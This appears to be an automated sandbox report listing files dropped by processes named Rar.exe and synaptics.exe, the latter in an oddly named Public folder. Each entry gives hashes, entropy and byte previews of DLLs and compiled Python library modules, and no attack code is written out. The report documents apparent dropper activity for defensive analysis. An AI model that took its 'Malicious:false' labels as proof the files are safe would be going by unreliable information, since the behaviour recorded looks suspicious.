                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5$..qE{.qE{.qE{.x=..sE{.#0z.sE{.#0~.zE{.#0..{E{.#0x.sE{..0z.sE{.qEz.LE{.:=z.tE{..0s.pE{..0{.pE{..0..pE{..0y.pE{.RichqE{.........PE..L...H.,d...........!........."...............0......................................u%....@..........................:..L....;..x....`...............<.../...p......D6..T............................6..@............0...............................text............................... ..`.rdata.."....0......................@..@.data........P......................@....rsrc........`.......0..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1196824
                                                                                                                                                                                      Entropy (8bit):6.776326140308749
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:E6OOR2q+dGpg4XzLojJT5r6hKarVTgnEEUNTZOdEV8RpDq+m5:zR2L94Xo5Q5OEeEYDzm5
                                                                                                                                                                                      MD5:C60F6C4051EB55350C6EEDF5A87016AA
                                                                                                                                                                                      SHA1:DB1C31C12BE04A5785D7CA3B8EA91B290EE9D1D8
                                                                                                                                                                                      SHA-256:376D80DB08CEC2C8873A4D5EBC7D83F50F26A43EBAA837020874C8586FD85975
                                                                                                                                                                                      SHA-512:FCBDFC27A778B1084BE96B88CF438E0937ADB8BABC41B538892B76283232AA557CE46701A8F62AB2FDB208AB0933F0E473CBD6DAD59203DC7495F48EE289B2A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.............^....L.....L.....L.....L.....U.........................2..........Rich...................PE..L.....,d...........!................_........................................@.......7....@.........................`;..."...].........................../...........5..T........................... 6..@............................................text............................... ..`.rdata...Y.......Z..................@..@.data....'...p..."...Z..............@....rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1114904
                                                                                                                                                                                      Entropy (8bit):5.393522969186712
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:PAKqQCb5Pfhnzr0qlmL8klMmuZ63NGM7IRG5eeIDe6VZyrIBHdQLhfFE+tc9S:PAKsZV0mmduJMMREtIC6Vo4uLc9S
                                                                                                                                                                                      MD5:73A25EF47977BFF82315023F7F8E9DB1
                                                                                                                                                                                      SHA1:9BD7882C39A995EA4044FB5D562060C16AF9A023
                                                                                                                                                                                      SHA-256:AC2966C1A1F1FBEE97666E0AAADE5AB960B445AF3BACC1650B83EA8B637F2F7A
                                                                                                                                                                                      SHA-512:C6155957E37C7A690E815F78508CCDCE9036E2EFFE45A9B47EAAFBB8A091D661B808C1A2CC6C7B83B41752121B869A877C981EE346B790F3CF3900A3D6F0B198
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#..p..p..p...p..p..q..p..q...p..q..p..q..p..q..p..q..p..p...p..q..p..q..p..tp..p..q..pRich..p........................PE..L...K.,d...........!.....8...........=.......P.......................................X....@.............................X................................/..............T...........................P...@............P..,............................text...J7.......8.................. ..`.rdata...}...P...~...<..............@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27928
                                                                                                                                                                                      Entropy (8bit):6.803210417146149
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:8wPBcVsin9R+URILO7I5YiSyvCJPxWEau:8wP2L9R+URILO767SyuPxb
                                                                                                                                                                                      MD5:49F55D492AD016A6F0D0183768F8C903
                                                                                                                                                                                      SHA1:0001BFFA17EEF519406710FA18808047EF19B590
                                                                                                                                                                                      SHA-256:865C296E84C03E277145DC8DEE6E14C2AC418371A8D227576682ED596708EED8
                                                                                                                                                                                      SHA-512:B0B57AF43FF2A3498EDCEEFAE71E253B3D9AEF23086D2BB41779A8B370BBA2801CA0CF5EFDD998E4415CB2EA61AFDA028BD1781C2DBBC8D1C157425B12D861DE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6o..W.[.W.[.W.[./.[.W.[.".Z.W.[.".Z.W.[.".Z.W.[.".Z.W.[)".Z.W.[./.Z.W.[.W.[.W.[)".Z.W.[)".Z.W.[)".[.W.[)".Z.W.[Rich.W.[........................PE..L...L.,d...........!.........(...............0......................................3.....@..........................<..P...`<.......`...............>.../...p..X....7..T............................7..@............0...............................text...T........................... ..`.rdata.......0......................@..@.data...p....P......................@....rsrc........`.......0..............@..@.reloc..X....p.......:..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5302
                                                                                                                                                                                      Entropy (8bit):4.761272492188341
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:iO+uujd+ShBkhGL45k3XYgvSEMkQFne2b1HDG:D+uSkkEknNvSEMkTk1HDG
                                                                                                                                                                                      MD5:903D790CEF59478A60829CC3F6978890
                                                                                                                                                                                      SHA1:3D7A098629D4217D34097FAF3DEE431A9A93B5C9
                                                                                                                                                                                      SHA-256:70A3FB890DE3673DA0118F401F54E5C6B22639F45CDA7834F638EC3198DDACF7
                                                                                                                                                                                      SHA-512:CD09FF62092C460B745FC6241F3F6D79B81D0B22FB541210C0D510314FD6209768F058FF4F76666D5B11BB9A0DF48F3DA6859DEBAB477598B302E44A25059C95
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Record of phased-in incompatible language changes.....Each line is of the form:.... FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",".. CompilerFlag ")"....where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples..of the same form as sys.version_info:.... (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int.. PY_MINOR_VERSION, # the 1; an int.. PY_MICRO_VERSION, # the 0; an int.. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string.. PY_RELEASE_SERIAL # the 3; an int.. )....OptionalRelease records the first release in which.... from __future__ import FeatureName....was accepted.....In the case of MandatoryReleases that have not yet occurred,..MandatoryRelease predicts the release in which the feature will become part..of the language.....Else MandatoryRelease records when the feature became part of the language;..in releases at or after that, modules no longer need.... from __futur
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):65
                                                                                                                                                                                      Entropy (8bit):4.094714259436315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SbFQZhHFSbWQRSLABKCW5:SbFsBwbWEQYKx
                                                                                                                                                                                      MD5:21452BCD01B4FA606D021E2A35A41918
                                                                                                                                                                                      SHA1:63D058B0E42269750CE9FD4CA5049C57F6E26CAA
                                                                                                                                                                                      SHA-256:AB3048BB63BB222868B04BED809A534986466828A6983C2686CE048C4F198D18
                                                                                                                                                                                      SHA-512:F97089BB79A2E26A7D405BDA1B34C5966C55CCF1005CF88A627DD10625F526F530A74CC4A14A19DD75E6FD538796BB9380BE9D96AFFED75A8D77552380548FAF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This file exists as a helper for the test.test_frozen module...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4144
                                                                                                                                                                                      Entropy (8bit):5.361852365766103
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:zgdNzUuGd+P2sKNUWAom2j8kQAnPPELBG0uY:q4BRRAom1gPG00uY
                                                                                                                                                                                      MD5:238CAB637058DFE2CD240BC466A24952
                                                                                                                                                                                      SHA1:99D9E8F59DD7F21F3EEEA38E8B97E1A892317B76
                                                                                                                                                                                      SHA-256:1C6A7F6DD67BCDAD253CA16589BEAD5D3A8BB046379F2DB0C23018E4A5277A17
                                                                                                                                                                                      SHA-512:329A1ADF8E63FE143F0D9D3D021AA327E20BB3E142C2FA38DCCB3C743AB6C0BB6FDEC2C638E1C56E194087B59441DAF911067276D6FBEFDBD1D524D7AFE977A8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32938
                                                                                                                                                                                      Entropy (8bit):5.035332633387824
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:WpD08l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:uFl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                      MD5:B3C01D3CB0E0126489088960DB293F5A
                                                                                                                                                                                      SHA1:F26F268B6A304129B01D4D4A43815D5EC49FE125
                                                                                                                                                                                      SHA-256:3950BE0C845DB61A814A23F940726C6F2CE7266497FD843EA3E68AD2E4ED9EF1
                                                                                                                                                                                      SHA-512:E18C763B95EFC56DEFFC3B94039B766D39B54E60B0B56260CA5BCEA19C5EC2D3E9297A732390FAB67FBDC0C5894AC7947CCA47960C011927F8FE1C1B8C264C4A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4525
                                                                                                                                                                                      Entropy (8bit):5.143682408486357
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:inAZIr5Fc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:iNvByEeIOQCxNWQRqOT0f
                                                                                                                                                                                      MD5:927EEB6AFD37AD56BD9F4A90AE269759
                                                                                                                                                                                      SHA1:1D9F7E3D18183587DB01F03805183FFAAB141A4A
                                                                                                                                                                                      SHA-256:4288B1098DCB7B0277D84132A5E7C0DE40AB70E9B7437F4668A0E4F8A57CB02D
                                                                                                                                                                                      SHA-512:67F6187C24EE6197637CB3FFA1A40D6D331A1C913F881943829C279CE47CBBAC33F8E1907DCADAB9DA250D4EDA8E367434EE90FFAD5A2AC38DEF6963E5795D93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....0C:\Users\Public\QExvbmVOb25l\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on file
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3560
                                                                                                                                                                                      Entropy (8bit):5.07663630249693
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:PLsOn3Ch9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:PLs8Cfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                      MD5:02B08A8777898FFA63ACE79933840EDE
                                                                                                                                                                                      SHA1:B66A6C781D353645B60490807B73F20AD2202A63
                                                                                                                                                                                      SHA-256:CA83A1ADD4CF3E79B662FF8FC0A094B9D68A186DDA6619BB3758503FF20EAB09
                                                                                                                                                                                      SHA-512:51AA92D4C58B06380F18328ABAAC72284717A821B0FDF08309C66D3BEEAC13D6F7B20740EC1B7DD7D8B174F6AEE68595AEA1A4E88ED1083CA20986606284A483
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....1C:\Users\Public\QExvbmVOb25l\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for prin
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7621
                                                                                                                                                                                      Entropy (8bit):4.6115045510590225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6oIAmOjav3ze0qLnKFHWpLiEEskjXoNizml+Ws2w13TvqcJlnqJEqBTgztqetKHs:3IAbj236LTKF2pLiE3kjXoEzml+Ws2wV
                                                                                                                                                                                      MD5:A93DBD13CC36FB1CF8CC9B7081F3AA19
                                                                                                                                                                                      SHA1:937C31A6577EA326A12A3FA28A1B079CBFB8C835
                                                                                                                                                                                      SHA-256:F1FDC082CF96C8065C324AC72B43E20C037DE7BFD555BCD9CBA53B8305A70066
                                                                                                                                                                                      SHA-512:0E2C9C67B531C5A4E04B842CF353452BC285370BCFDA1A58A90A9E5E20E658F0CA72E382679897920D8990398C29E8B3EEC385F15B32A625714B738843F9BDCC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r...../C:\Users\Public\QExvbmVOb25l\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6764
                                                                                                                                                                                      Entropy (8bit):5.125302554277043
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ic2+dPAF6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:j2+dPPMGxYtag2VXLk5ewc
                                                                                                                                                                                      MD5:F652B2BE95086C5A295D33B907313E7D
                                                                                                                                                                                      SHA1:3C9BA26D01695AADB1DBA32753D3D1BAC28CC3FD
                                                                                                                                                                                      SHA-256:3E8DD6D0013BA0FEF3B2A80D5744289E3C62E34F07427E5A44E7A16F7DC6C772
                                                                                                                                                                                      SHA-512:6CCA9D47DAA7CE216078E7E63D304D040CAECE6B110CB30C6FE639EEB40F0E07753633AD8C332CD26ECC06095CED73C01ED31E240BCD858F377D1B2FD38E2A2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....'C:\Users\Public\QExvbmVOb25l\lib\abc.py..ab
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):55752
                                                                                                                                                                                      Entropy (8bit):5.278446087691415
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:v4tQGlgD7UjM0gB2ze0GIHimylhWNbflS8rHKMAsSbUgUU0/9eKQddNhvDqIUy7w:v4+GlgD7Uj4B2XNHehW7uVvuIlPgj
                                                                                                                                                                                      MD5:5BC5B230DC2A26F04CEE94AEC9F33158
                                                                                                                                                                                      SHA1:7A93B420BF777753170523A6A735F8D46A973E04
                                                                                                                                                                                      SHA-256:363954A7D63FCD4E9561A141DD7C8F7C5E25F8562EB9AE09CCE3106C8671D9AC
                                                                                                                                                                                      SHA-512:2C50F3711F6E8A2D9B809011C13225A0683A8D6A299A28EA0BC549193C93F79ADEE7788432D4B0833B1CE288E7971E689904494ED28365C545AF1224DFBFD4D1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d`d.d.d...d.d...Z.d.d...Z.dad.d...d.d...Z.d.d...Z.d.d...Z.dbd.d...Z.d.d...Z.d.d...Z.dcd.d...Z.d.d ..Z.d!d"..Z.d.d#..d$d%..Z.d&d'..Z.G.d(d)..d)e...Z.G.d*d+..d+e...Z.e.e.d,..s.d-d...Z.d/d0..Z.e.e.e...e._.e.e.e...e._.G.d1d2..d2e ..Z!d3d4..Z"G.d5d6..d6e.e!d7..Z#G.d8d9..d9e.e!d7..Z$G.d:d;..d;e.e!d7..Z%G.d<d=..d=e.e!d7..Z&G.d>d?..d?e.e!d7..Z'e#e(e)e*f.e$e+f.e%e,f.e&e d...e-f.e'e d@..f.i.Z.e#e-f.i.Z/e-d=e d...d=e(d6e)d6e*d6e+d9e,d;e d@..d?i.Z0G.dAdB..dBe1..Z2G.dCdD..dDe2..Z3G.dEdF..dFe2..Z4e.e5dG....s"dHdI..Z6dJdK..Z7e.e6e7..e5_8G.dLdM..dMe9..Z:G.dNdO..dOe;..Z<G.dPdQ..dQe;..Z=G.dRdS..dSe;..Z>dTe?e.j@jAd.......ZBG.dUdV..dVe...ZCdWZDdXZEg.eD..eE..R.ZFG.dYdZ..dZe...ZGd[d\..ZHd]d^..ZIeJd_k...ryeI....d.S.d.S.)daH.... ast. ~~~.. The `ast` module helps Python applications to process trees of the Python. abstract syntax grammar. The abstract syntax itself might change with. each Python re
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17175
                                                                                                                                                                                      Entropy (8bit):5.496809791634414
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:KZvQ1tayn9wBqXY71hITEOtuAk8CUSSYkXJ20RQa83hg9M6o0RzuQcT/zlNFs61V:4qay9wgo71hITOtHYP9M70xuzRNG61V3
                                                                                                                                                                                      MD5:9D08860527321B2AF680F9F02516272C
                                                                                                                                                                                      SHA1:A9F653311F52A3CA0EAD0CFA45D86D547A4FF71F
                                                                                                                                                                                      SHA-256:58A6CD8139E2D8E2E08D8AF2A159AB6E510A339568BB1DAEBF89A36A2B6FA127
                                                                                                                                                                                      SHA-512:0B6288767F558D5B3860EA6B0237727D021FF5E34205D4C1A79DA02C9AFB96AFDDDAC444C2F3EBEED45E91208572EE7850CB8506AECF22160F78B466BD5642BD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2601
                                                                                                                                                                                      Entropy (8bit):5.2176156290909645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:TChwHaPJ7Bn7V30EOCl7VU3OpOBn7B3wCLnCRl7VC39eV:TCh7Bx30EOC03OpOB93wGCRi34V
                                                                                                                                                                                      MD5:E347D2F2FAFE6B8C94ADCD8874825E9E
                                                                                                                                                                                      SHA1:3FE38B242A5BBE1DC656CB152AE65E9EED803DE5
                                                                                                                                                                                      SHA-256:93A4FB26F551AFFC901DD6E8A9647B13E1441893B77CA38CF089C3663A6CE0A9
                                                                                                                                                                                      SHA-512:6AD3AF2C2C6EE66CD4D2A4ADFA1A0E057A0FD002B249300F47C7E9704972D1AEF05F21F3B453AA5DD10FBED567B27C026D66BF5E3A2054D8C064626639379C55
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....*C:\Users\Public\QExvbmVOb25l\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <=
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10883
